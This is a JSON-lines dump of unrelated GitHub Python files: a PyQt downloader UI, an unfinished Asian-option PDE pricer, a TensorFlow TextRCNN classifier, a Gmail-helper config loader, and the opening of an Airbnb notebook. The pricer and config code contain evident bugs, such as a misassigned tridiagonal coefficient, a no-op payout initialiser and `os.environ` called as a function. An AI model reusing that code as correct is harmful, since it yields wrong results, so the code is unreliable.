rgba(77, 77, 77, 255));\\n\"\n\"}\\n\"\n\"QLineEdit {\\n\"\n\" border-width: 1px; border-radius: 4px;\\n\"\n\" border-color: rgb(58, 58, 58);\\n\"\n\" border-style: inset;\\n\"\n\" padding: 0 8px;\\n\"\n\" color: rgb(255, 255, 255);\\n\"\n\" background:rgb(100, 100, 100);\\n\"\n\" selection-background-color: rgb(187, 187, 187);\\n\"\n\" selection-color: rgb(60, 63, 65);\\n\"\n\"}\\n\"\n\"QLabel {\\n\"\n\" color:rgb(255,255,255); \\n\"\n\"}\\n\"\n\"QProgressBar {\\n\"\n\" text-align: center;\\n\"\n\" color: rgb(240, 240, 240);\\n\"\n\" border-width: 1px; \\n\"\n\" border-radius: 10px;\\n\"\n\" border-color: rgb(58, 58, 58);\\n\"\n\" border-style: inset;\\n\"\n\" background-color:rgb(77,77,77);\\n\"\n\"}\\n\"\n\"QProgressBar::chunk {\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:0.7, x2:0.5, y2:0.3, stop:0 rgba(87, 97, 106, 255), stop:1 rgba(93, 103, 113, 255));\\n\"\n\" border-radius: 5px;\\n\"\n\"}\\n\"\n\"QMenuBar {\\n\"\n\" background:rgb(82, 82, 82);\\n\"\n\"}\\n\"\n\"QMenuBar::item {\\n\"\n\" color:rgb(223,219,210);\\n\"\n\" spacing: 3px;\\n\"\n\" padding: 1px 4px;\\n\"\n\" background: transparent;\\n\"\n\"}\\n\"\n\"\\n\"\n\"QMenuBar::item:selected {\\n\"\n\" background:rgb(115, 115, 115);\\n\"\n\"}\\n\"\n\"QMenu::item:selected {\\n\"\n\" color:rgb(255,255,255);\\n\"\n\" border-width:2px;\\n\"\n\" border-style:solid;\\n\"\n\" padding-left:18px;\\n\"\n\" padding-right:8px;\\n\"\n\" padding-top:2px;\\n\"\n\" padding-bottom:3px;\\n\"\n\" background:qlineargradient(spread:pad, x1:0.5, y1:0.7, x2:0.5, y2:0.3, stop:0 rgba(87, 97, 106, 255), stop:1 rgba(93, 103, 113, 255));\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-bottom-color: rgb(58, 58, 58);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\"}\\n\"\n\"QMenu::item {\\n\"\n\" color:rgb(223,219,210);\\n\"\n\" background-color:rgb(78,78,78);\\n\"\n\" padding-left:20px;\\n\"\n\" padding-top:4px;\\n\"\n\" padding-bottom:4px;\\n\"\n\" padding-right:10px;\\n\"\n\"}\\n\"\n\"QMenu{\\n\"\n\" background-color:rgb(78,78,78);\\n\"\n\"}\\n\"\n\"QTabWidget {\\n\"\n\" color:rgb(0,0,0);\\n\"\n\" background-color:rgb(247,246,246);\\n\"\n\"}\\n\"\n\"QTabWidget::pane {\\n\"\n\" border-color: rgb(77,77,77);\\n\"\n\" background-color:rgb(101,101,101);\\n\"\n\" border-style: solid;\\n\"\n\" border-width: 1px;\\n\"\n\" border-radius: 6px;\\n\"\n\"}\\n\"\n\"QTabBar::tab {\\n\"\n\" padding:2px;\\n\"\n\" color:rgb(250,250,250);\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(77, 77, 77, 255), stop:1 rgba(97, 97, 97, 255));\\n\"\n\" border-style: solid;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-right-radius:4px;\\n\"\n\" border-top-left-radius:4px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(95, 92, 93, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(95, 92, 93, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(95, 92, 93, 255));\\n\"\n\" border-bottom-color: rgb(101,101,101);\\n\"\n\"}\\n\"\n\"QTabBar::tab:selected, QTabBar::tab:last:selected, QTabBar::tab:hover {\\n\"\n\" background-color:rgb(101,101,101);\\n\"\n\" margin-left: 0px;\\n\"\n\" margin-right: 1px;\\n\"\n\"}\\n\"\n\"QTabBar::tab:!selected {\\n\"\n\" margin-top: 1px;\\n\"\n\" margin-right: 1px;\\n\"\n\"}\\n\"\n\"QCheckBox {\\n\"\n\" color:rgb(223,219,210);\\n\"\n\" padding: 2px;\\n\"\n\"}\\n\"\n\"QCheckBox:hover {\\n\"\n\" border-radius:4px;\\n\"\n\" border-style:solid;\\n\"\n\" padding-left: 1px;\\n\"\n\" padding-right: 1px;\\n\"\n\" padding-bottom: 1px;\\n\"\n\" padding-top: 1px;\\n\"\n\" border-width:1px;\\n\"\n\" border-color: rgb(87, 97, 106);\\n\"\n\" background-color:qlineargradient(spread:pad, x1:0.5, y1:0.7, x2:0.5, y2:0.3, stop:0 rgba(87, 97, 106, 150), stop:1 rgba(93, 103, 113, 150));\\n\"\n\"}\\n\"\n\"QCheckBox::indicator:checked {\\n\"\n\" border-radius:4px;\\n\"\n\" border-style:solid;\\n\"\n\" border-width:1px;\\n\"\n\" border-color: rgb(180,180,180);\\n\"\n\" background-color:qlineargradient(spread:pad, x1:0.5, y1:0.7, x2:0.5, y2:0.3, stop:0 rgba(87, 97, 106, 255), stop:1 rgba(93, 103, 113, 255));\\n\"\n\"}\\n\"\n\"QCheckBox::indicator:unchecked {\\n\"\n\" border-radius:4px;\\n\"\n\" border-style:solid;\\n\"\n\" border-width:1px;\\n\"\n\" border-color: rgb(87, 97, 106);\\n\"\n\" background-color:rgb(255,255,255);\\n\"\n\"}\\n\"\n\"QStatusBar {\\n\"\n\" color:rgb(240,240,240);\\n\"\n\"}\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setStyleSheet(\"\")\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setObjectName(\"tabWidget\")\n self.tab_1 = QtWidgets.QWidget()\n self.tab_1.setObjectName(\"tab_1\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tab_1)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.tableView = QtWidgets.QTableView(self.tab_1)\n self.tableView.setObjectName(\"tableView\")\n self.tableView.setSelectionBehavior(1)\n self.tableView.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.tableView.verticalHeader().hide()\n self.verticalLayout_2.addWidget(self.tableView)\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.label_1 = QtWidgets.QLabel(self.tab_1)\n self.label_1.setObjectName(\"label_1\")\n self.horizontalLayout.addWidget(self.label_1)\n self.dateEdit = QtWidgets.QDateEdit(self.tab_1)\n self.dateEdit.setDateTime(QtCore.QDateTime(QtCore.QDate(2023, 1, 1), QtCore.QTime(0, 0, 0)))\n self.dateEdit.setCalendarPopup(True)\n self.dateEdit.setObjectName(\"dateEdit\")\n self.dateEdit.setDate(datetime.now()) # установка даты на сегодня\n self.dateEdit.setMaximumDate(datetime.now()) # установка максимальной даты\n self.horizontalLayout.addWidget(self.dateEdit)\n self.pushButton_1 = QtWidgets.QPushButton(self.tab_1)\n self.pushButton_1.setObjectName(\"pushButton_1\")\n self.horizontalLayout.addWidget(self.pushButton_1)\n self.verticalLayout_2.addLayout(self.horizontalLayout)\n self.label_5 = QtWidgets.QLabel(self.tab_1)\n self.label_5.setObjectName(\"label_5\")\n self.verticalLayout_2.addWidget(self.label_5)\n self.progressBar = QtWidgets.QProgressBar(self.tab_1)\n self.progressBar.setProperty(\"value\", 0)\n self.progressBar.setObjectName(\"progressBar\")\n self.verticalLayout_2.addWidget(self.progressBar)\n self.tabWidget.addTab(self.tab_1, \"\")\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName(\"tab_2\")\n self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.tab_2)\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(\"label_2\")\n self.verticalLayout_4.addWidget(self.label_2)\n self.gridLayout = QtWidgets.QGridLayout()\n self.gridLayout.setObjectName(\"gridLayout\")\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setObjectName(\"label_6\")\n self.gridLayout.addWidget(self.label_6, 0, 0, 1, 1)\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setObjectName(\"label_7\")\n self.gridLayout.addWidget(self.label_7, 0, 1, 1, 1)\n self.checkBox_2 = QtWidgets.QCheckBox(self.tab_2)\n self.checkBox_2.setObjectName(\"checkBox_2\")\n self.gridLayout.addWidget(self.checkBox_2, 0, 2, 1, 1)\n self.checkBox_1 = QtWidgets.QCheckBox(self.tab_2)\n self.checkBox_1.setObjectName(\"checkBox_1\")\n self.gridLayout.addWidget(self.checkBox_1, 0, 3, 1, 1)\n self.toolButton = QtWidgets.QPushButton(self.tab_2)\n self.toolButton.setObjectName(\"toolButton\")\n self.gridLayout.addWidget(self.toolButton, 0, 4, 1, 1, QtCore.Qt.AlignHCenter)\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.gridLayout.addWidget(self.pushButton_2, 0, 5, 2, 1)\n self.lineEdit_4 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_4.setObjectName(\"lineEdit_4\")\n self.gridLayout.addWidget(self.lineEdit_4, 1, 0, 1, 1)\n self.lineEdit_3 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_3.setObjectName(\"lineEdit_3\")\n self.gridLayout.addWidget(self.lineEdit_3, 1, 1, 1, 1)\n self.checkBox_4 = QtWidgets.QCheckBox(self.tab_2)\n self.checkBox_4.setObjectName(\"checkBox_4\")\n self.gridLayout.addWidget(self.checkBox_4, 1, 2, 1, 1)\n self.checkBox_3 = QtWidgets.QCheckBox(self.tab_2)\n self.checkBox_3.setObjectName(\"checkBox_3\")\n self.gridLayout.addWidget(self.checkBox_3, 1, 3, 1, 1)\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setObjectName(\"lineEdit_1\")\n self.gridLayout.addWidget(self.lineEdit_1, 1, 4, 1, 1)\n self.verticalLayout_4.addLayout(self.gridLayout)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label_4.setFont(font)\n self.label_4.setObjectName(\"label_4\")\n self.verticalLayout_4.addWidget(self.label_4)\n self.gridLayout_2 = QtWidgets.QGridLayout()\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.tableView_2 = QtWidgets.QTableView(self.tab_2)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.tableView_2.sizePolicy().hasHeightForWidth())\n self.tableView_2.setSizePolicy(sizePolicy)\n self.tableView_2.setObjectName(\"tableView_2\")\n self.tableView_2.setSelectionBehavior(1)\n self.tableView_2.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.tableView_2.verticalHeader().hide()\n self.gridLayout_2.addWidget(self.tableView_2, 0, 0, 2, 1)\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setObjectName(\"label_3\")\n self.gridLayout_2.addWidget(self.label_3, 0, 1, 1, 1, QtCore.Qt.AlignHCenter|QtCore.Qt.AlignBottom)\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.pushButton_3.sizePolicy().hasHeightForWidth())\n self.pushButton_3.setSizePolicy(sizePolicy)\n self.pushButton_3.setMaximumSize(QtCore.QSize(80, 30))\n self.pushButton_3.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.pushButton_3.setObjectName(\"pushButton_3\")\n self.gridLayout_2.addWidget(self.pushButton_3, 1, 1, 1, 1)\n self.verticalLayout_4.addLayout(self.gridLayout_2)\n self.tabWidget.addTab(self.tab_2, \"\")\n self.verticalLayout.addWidget(self.tabWidget)\n MainWindow.setCentralWidget(self.centralwidget)\n\n\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n self.new_model = QtGui.QStandardItemModel(parent=self)\n model_header = ['Название', 'IP', 'Путь сохранения', 'Канал 1', 'Канал 2', 'Канал 3', 'Канал 4']\n self.new_model.setHorizontalHeaderLabels(model_header)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Cayman\"))\n self.label_1.setText(_translate(\"MainWindow\", \"Название объекта для скачивания\"))\n self.pushButton_1.setText(_translate(\"MainWindow\", \"Скачать\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Статус процесса\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_1), _translate(\"MainWindow\", \"Скачать с Cayman\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Добавить новый Cayman для автоскачивания\"))\n self.label_6.setText(_translate(\"MainWindow\", \"Название\"))\n self.label_7.setText(_translate(\"MainWindow\", \"ip адрес\"))\n self.checkBox_2.setText(_translate(\"MainWindow\", \"Channel1\"))\n self.checkBox_1.setText(_translate(\"MainWindow\", \"Channel2\"))\n self.toolButton.setText(_translate(\"MainWindow\", \"Обзор\"))\n self.pushButton_2.setText(_translate(\"MainWindow\", \"Добавить\"))\n self.checkBox_4.setText(_translate(\"MainWindow\", \"Channel3\"))\n self.checkBox_3.setText(_translate(\"MainWindow\", \"Channel4\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Удалить Cayman из автоскачивания\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Cayman\"))\n self.pushButton_3.setText(_translate(\"MainWindow\", \"Удалить\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate(\"MainWindow\", \"Автоматическое скачивание\"))\n","repo_name":"zhukovva/cayman","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":18015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15451336800","text":"from typing import Callable, Tuple, Dict, Set\n\nimport numpy as np\nimport scipy.integrate as integrate\n\nfrom fypy.pricing.pde.utility.TridiagonalMatrix import TridiagonalMatrix\nfrom fypy.pricing.pde.utility.TridiagonalSolver import solve_dirichlet\n\n\nclass AsianOption:\n def __init__(self,\n strike: float,\n is_call: bool,\n observation_times: Dict[str, np.array],\n future_expiries: Dict[str, float],\n weights: Dict[str, float]):\n\n self._strike = strike\n self._is_call = is_call\n\n # Maps from the underlying tag to data. Validate keys.\n all_keys = set(observation_times.keys()).union(future_expiries.keys()).union(weights.keys())\n if len(all_keys) == 0:\n raise ValueError(f\"there must be at least one underlying\")\n self._num_underlyings = len(all_keys)\n self._all_underlyings = all_keys\n if len(observation_times) != len(all_keys) or len(future_expiries) != len(all_keys) or len(weights) != len(\n all_keys):\n raise ValueError(f\"observation_times, future_expiries, and weights must have the same underlying keys\")\n\n self._observation_times = observation_times\n self._future_expiries = future_expiries\n self._weights = weights\n\n @property\n def strike(self) -> float:\n return self._strike\n\n @property\n def is_call(self) -> bool:\n return self._is_call\n\n @property\n def observation_times(self) -> Dict[str, np.array]:\n return self._observation_times\n\n @property\n def weights(self) -> Dict[str, float]:\n return self._weights\n\n @property\n def future_expiries(self) -> Dict[str, float]:\n return self._future_expiries\n\n @property\n def all_underlyings(self) -> Set[str]:\n return self._all_underlyings\n\n def flatten_times(self):\n underlyings_at_times = {}\n\n for undl, times in self._observation_times:\n for t in times:\n underlyings_at_times.setdefault(t, set({})).add(undl)\n return underlyings_at_times\n\n\nclass AsianPDEPricer:\n def __init__(self,\n instrument: AsianOption,\n q: Callable[[float], float],\n mu: Callable[[float], float],\n sigma: Callable[[float, float], float],\n Ny: int):\n \"\"\"\n \"\"\"\n\n self._instrument = instrument\n\n self._q = q\n self._mu = mu\n self._sigma = sigma\n\n self._Ny = Ny\n\n # Map from times t to \\lambda_t. Make sure t = 0 is included.\n self._lambda = {}\n\n # \\Lambda_t = \\sum_{t_i} 1_{t_i < t} \\lambda_{t_i}\n self._Lambda = {}\n\n self._create_lambdas()\n\n self._current_Lambda = self._lambda_grid[-1]\n\n self._grid_y = None\n\n # TODO: Set.\n self._y0 = -2.0\n\n self._A = TridiagonalMatrix.create_matrix(self._Ny)\n self._B_a = np.zeros(shape=self._Ny - 1)\n self._B_b = np.zeros(shape=self._Ny)\n self._B_c = np.zeros(shape=self._Ny - 1)\n\n def _create_lambdas(self):\n \"\"\"\n From the observation times and weights, and the drift, mu, we can derive the lambda constants, and the\n cumulative Lambda constants.\n\n \\\\lambda_{j,k} = \\\\theta_j * \\\\exp [ \\\\int_{t_{j,k}}^{T_j} \\\\mu(s) ds ]\n\n where t_{j,k} is the k-th monitoring type of the j-th maturity, T_j is the final expiry of the j-th maturity.\n \"\"\"\n\n self._lambda = {}\n for undl in self._instrument.all_underlyings:\n T = self._instrument.future_expiries[undl]\n w = self._instrument.weights[undl]\n for t in self._instrument.observation_times[undl]:\n # Integrate\n value, err = integrate.quad(self._mu, t, T)\n lm = w * np.exp(value)\n self._lambda.setdefault(T, []).append(lm)\n\n for t, lambdas in sorted(self._lambda.items()):\n self._lambda[t] = np.sum(lambdas)\n\n # Create cumulative lambda => Lambda.\n running_sum = 0.\n lambda_array = []\n for t_i, lambda_i in sorted(self._lambda.items()):\n if t_i < 0:\n continue\n running_sum += lambda_i\n lambda_array.append(lambda_i)\n self._Lambda[t_i] = running_sum\n\n self._lambda_grid = np.array(lambda_array)\n\n def price(self):\n observation_time_grid = self._create_observation_time_grid()\n\n # Initialize y-grid.\n self._grid_y = self._create_y_grid()\n\n # Initialize payout.\n yvals = np.zeros(shape=self._Ny)\n self._initialize_payout(yvals)\n\n # Evolve PDE.\n for i in range(len(observation_time_grid) - 1):\n # Note that T0 < T1\n T0 = observation_time_grid[i]\n T1 = observation_time_grid[i + 1]\n\n # Set the current Lambda\n self._current_Lambda = self._Lambda[T1]\n\n # Create \"minor\" time grid, for evolution between t0 and t1.\n time_grid = self._create_time_grid(T0, T1)\n for it in range(len(time_grid) - 1):\n t0 = time_grid[it]\n t1 = time_grid[it + 1]\n dt = t0 - t1\n\n # Set up the A, B matrices.\n self._create_matrices(t0, dt)\n\n # Update the solution.\n yvals = self._solve_timestep(yvals=yvals)\n\n # Create next y-grid, interpolate values to initialize the next solution on that grid.\n pass\n\n def _w(self, t: float, y: float) -> float:\n return -self._mu(t) * (y + self._current_Lambda)\n\n def _v(self, t: float, y: float) -> float:\n return -self._sigma(t, -self._instrument.strike / y) * np.square(y + self._current_Lambda)\n\n def _create_y_grid(self) -> np.array:\n return np.linspace(self._y0, self._current_Lambda, self._Ny)\n\n def _initialize_payout(self, yvals: np.array):\n # NOTE: This probably won't work.\n # for i in range(self._Ny):\n # # Call payout.\n # yvals[i] = np.maximum(self._grid_y[i] - self._instrument.strike, 0)\n yvals = np.zeros(shape=self._Ny)\n\n def _create_matrices(self, t: float, dt: float):\n dy = self._grid_y[1] - self._grid_y[0] # Uniform grid.\n inv_dy = 1. / dy\n inv_dy_sqr = np.square(inv_dy)\n inv_dt = 1. / dt\n\n for i, y in enumerate(self._grid_y[1:-1]): # for j = 1, ..., Ny - 2\n self._A.lower[i + 1] = 0.25 * self._w(t, y) * inv_dy - 0.5 * self._v(t, y) * inv_dy_sqr\n self._A.diag[i + 1] = 0.5 * self._q(t) + inv_dt + 0.5 * self._v(t, y) * inv_dy_sqr\n self._A.lower[i + 1] = -0.25 * self._w(t, y) * inv_dy - 0.5 * self._v(t, y) * inv_dy_sqr\n\n self._B_a[i + 1] = -self._A.lower[i + 1]\n self._B_b[i + 1] = -self._A.diag[i + 1] + 2. * inv_dt\n self._B_c[i + 1] = -self._A.lower[i + 1]\n\n def _create_observation_time_grid(self) -> np.array:\n \"\"\"\n Create a grid of the observation times, ordered from final time to initial time (reverse time ordered).\n \"\"\"\n times = [0.]\n for t, _ in sorted(self._lambda.items(), reverse=True):\n if 0 < t:\n times.append(t)\n return np.array(times)\n\n def _create_time_grid(self, t0: float, t1: float) -> np.array:\n \"\"\"\n Create a time grid for evolving the system between t0 and t1. Note that t1 < t0, since this is a backwards\n equation.\n \"\"\"\n\n # TODO: Do this in a smart way.\n dt = 1. / 365.\n return np.arange(t0, t1, dt)\n\n def _solve_timestep(self, yvals) -> np.array:\n Ay = self._A * yvals\n\n u_left, u_right = 0., 0.\n return solve_dirichlet(self._B_a, self._B_b, self._B_c, Ay, u_left=u_left, u_right=u_right)\n","repo_name":"jkirkby3/fypy","sub_path":"fypy/pricing/pde/AsianPDEPricer.py","file_name":"AsianPDEPricer.py","file_ext":"py","file_size_in_byte":7858,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"71856035320","text":"# -*-coding:utf-8 -*-\nimport tensorflow.compat.v1 as tf\nfrom dataset.text_dataset import WordDataset as dataset\nfrom model.train_helper import Trainer, build_model_fn, BaseEncoder\nfrom tools.opt_utils import train_op_clip_decay\nfrom tools.train_utils import add_layer_summary, HpParser\n\nhp_list = [HpParser.hp('embedding_dropout', 0.3),\n HpParser.hp('keep_oov', 0),\n HpParser.hp('lower_clip', -5),\n HpParser.hp('upper_clip', 5),\n HpParser.hp('decay_rate', 0.95),\n HpParser.hp('cell_type', 'lstm'),\n HpParser.hp('cell_size', 1),# 几层RNN\n HpParser.hp('cell_hidden_list', '128', lambda x: [int(i) for i in x.split(',')]),\n HpParser.hp('keep_prob_list', '0.8', lambda x: [float(i) for i in x.split(',')]),\n HpParser.hp('rnn_activation', 'tanh')\n ]\nhp_parser = HpParser(hp_list)\n\n\ndef build_rnn_cell(cell_type, activation, hidden_units_list, keep_prob_list, cell_size):\n if cell_type.lower() == 'rnn':\n cell_class = tf.nn.rnn_cell.RNNCell\n elif cell_type.lower() == 'gru':\n cell_class = tf.nn.rnn_cell.GRUCell\n elif cell_type.lower() == 'lstm':\n cell_class = tf.nn.rnn_cell.LSTMCell\n else:\n raise Exception('Only rnn, gru, lstm are supported as cell_type')\n\n return tf.nn.rnn_cell.MultiRNNCell(\n cells=[tf.nn.rnn_cell.DropoutWrapper(cell=cell_class(num_units=hidden_units_list[i], activation=activation),\n output_keep_prob=keep_prob_list[i],\n state_keep_prob=keep_prob_list[i]) for i in range(cell_size)])\n\n\ndef bilstm(embedding, cell_type, activation, hidden_units_list, keep_prob_list, cell_size, seq_len, is_training):\n with tf.variable_scope('bilstm_layer'):\n if not is_training:\n keep_prob_list = len(keep_prob_list) * [1.0]\n fw = build_rnn_cell(cell_type, activation, hidden_units_list, keep_prob_list, cell_size)\n bw = build_rnn_cell(cell_type, activation, hidden_units_list, keep_prob_list, cell_size)\n\n # tuple of 2 : batch_size * max_seq_len * hidden_size\n outputs, _ = tf.nn.bidirectional_dynamic_rnn(fw, bw, embedding, seq_len, dtype=tf.float32)\n\n # concat forward and backward along embedding axis\n outputs = tf.concat(outputs, axis=-1) # batch_size * max_seq_len * (hidden_size * 2)\n add_layer_summary('bilstm_concat', outputs)\n return outputs\n\n\nclass TextrcnnEncoder(BaseEncoder):\n def __init__(self):\n super(TextrcnnEncoder, self).__init__()\n self.embedding = None\n\n def encode(self, features, is_training):\n with tf.variable_scope('embedding', reuse=tf.AUTO_REUSE):\n self.embedding = tf.get_variable(shape=[self.params['vocab_size'], self.params['embedding_size']],\n dtype=tf.float32, name='pretrain_embedding')\n input_emb = tf.nn.embedding_lookup(self.embedding, features['input_ids'], name='input_emb')\n input_emb = tf.layers.dropout(input_emb, rate=self.params['embedding_dropout'], seed=1234, training=is_training)\n add_layer_summary('input_emb', input_emb)\n\n with tf.variable_scope('textrcnn', reuse=tf.AUTO_REUSE):\n lstm_output = bilstm(input_emb, self.params['cell_type'], self.params['rnn_activation'],\n self.params['cell_hidden_list'], self.params['keep_prob_list'],\n self.params['cell_size'], features['seq_len'], is_training) # batch, max_seq_len, emb*2\n\n output_emb = tf.reduce_max(lstm_output, axis=1, keep_dims=False)\n\n return output_emb\n\n def __call__(self, features, labels, params, is_training):\n self.params = params\n embedding = self.encode(features, is_training)\n with tf.variable_scope('mlp'):\n preds = tf.layers.dense(embedding, units=self.params['label_size'], activation=None, use_bias=True)\n add_layer_summary('preds', preds)\n return preds, labels\n\n def init_fn(self):\n \"\"\"\n # load embedding in params using scaffold\n \"\"\"\n def init_fn(scaffold, sess):\n sess.run(self.embedding.initializer, {self.embedding.initial_value: self.params['embedding']})\n\n scaffold = tf.train.Scaffold(init_fn=init_fn)\n return scaffold\n\n def optimize(self, loss):\n \"\"\"\n Use Adam Optimizer with gradient clip and exponential decay\n \"\"\"\n train_op = train_op_clip_decay(loss, self.params['lr'],\n self.params['num_train_steps'], self.params['decay_rate'],\n self.params['lower_clip'], self.params['upper_clip']\n )\n return train_op\n\n\ntrainer = Trainer(model_fn=build_model_fn(TextrcnnEncoder()),\n dataset_cls=dataset)\n\n\n","repo_name":"DSXiangLi/SimpleClassification","sub_path":"model/textrcnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"32832136961","text":"import os\nimport sys\nimport yaml\n\n\ndef config_yaml():\n \"\"\"Returns config yaml path.\n First priority given to passed 0th argument.\n Second priority given to env var 'GMAIL_HELPER_CONFIG' value.\n\n Args: None\n \"\"\"\n try:\n if os.path.exists(sys.argv[1]):\n return sys.argv[1]\n else:\n return \"config.yaml\"\n except Exception as e:\n print(e)\n try:\n return os.environ(\"GMAIL_HELPER_CONFIG\")\n except:\n return \"config.yaml\"\n\n\nCONFIG = {}\ntry:\n with open(config_yaml(), \"r\") as ymlfile:\n CONFIG = yaml.safe_load(ymlfile)\nexcept Exception as e:\n print(e)\n print(\"error reading config file: '%s'; would try env var as default else make error exit\" % (config_yaml()))\n\n\ndef env_else_yaml(config_name):\n \"\"\"Returns config value of provided name.\n First priority given to env var value for it.\n Second priority given to config yaml value for it.\n Else it prints error and exits.\n\n Args: None\n \"\"\"\n try:\n envvar_name = \"GMAIL_HELPER_%s\" % (config_name)\n return os.environ(envvar_name)\n except:\n try:\n return CONFIG[config_name]\n except:\n print(\"failed to get config: %s\" % (config_name))\n sys.exit(1)\n\n\ndef gmail_credential_jsonpath():\n return env_else_yaml(\"gmail_credential_jsonpath\")\n\ndef gmail_auth_picklepath():\n return env_else_yaml(\"gmail_auth_picklepath\")\n\ndef log_debug():\n return env_else_yaml(\"log_debug\")\n\n\ndef get_dir_config(config_key):\n fs_path = env_else_yaml(config_key)\n if not os.path.isdir(fs_path):\n try:\n os.makedirs(fs_path)\n except:\n print(\"failed creating configured %s: %s\" % (config_key, fs_path))\n return fs_path\n\ndef data_basepath():\n return get_dir_config(\"data_basepath\")\n\ndef filters_json_basepath():\n return get_dir_config(\"filters_json_basepath\")\n\ndef scopes():\n ret_val = env_else_yaml(\"scopes\")\n if isinstance(ret_val, list):\n return ret_val\n else:\n return ret_val.split(\",\")\n\ndef since_year():\n return int(env_else_yaml(\"since_year\"))\n\ndef before_year():\n return int(env_else_yaml(\"before_year\"))\n\ndef filters_to_delete():\n ret_val = env_else_yaml(\"filters_to_delete\")\n if isinstance(ret_val, list):\n return ret_val\n else:\n return ret_val.split(\",\")\n\ndef message_ids_to_skip():\n ret_val = env_else_yaml(\"message_ids_to_skip\")\n if isinstance(ret_val, list):\n return ret_val\n else:\n return ret_val.split(\",\")\n\ndef labels_to_skip():\n ret_val = env_else_yaml(\"labels_to_skip\")\n if isinstance(ret_val, list):\n return ret_val\n else:\n return ret_val.split(\",\")\n","repo_name":"abhishekkr/gmail-helper","sub_path":"_config_/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"40"} +{"seq_id":"4628431060","text":"\n# coding: utf-8\n\n# Machine Learning Final Project\n# `Airbnb` Bookings\n# ===\n\n# # Abstract\n\n# New users on Airbnb can book a place to stay in 34,000+ cities across 190+ countries. By accurately predicting where a new user will book their first travel experience, Airbnb can share more personalized content with their community, decrease the average time to first booking, and better forecast demand.\n\n# ## Key Questions\n\n# - Predict which country a new user’s first booking destination will be. (Supervised)\n# - Constraints on users?\n# - Target 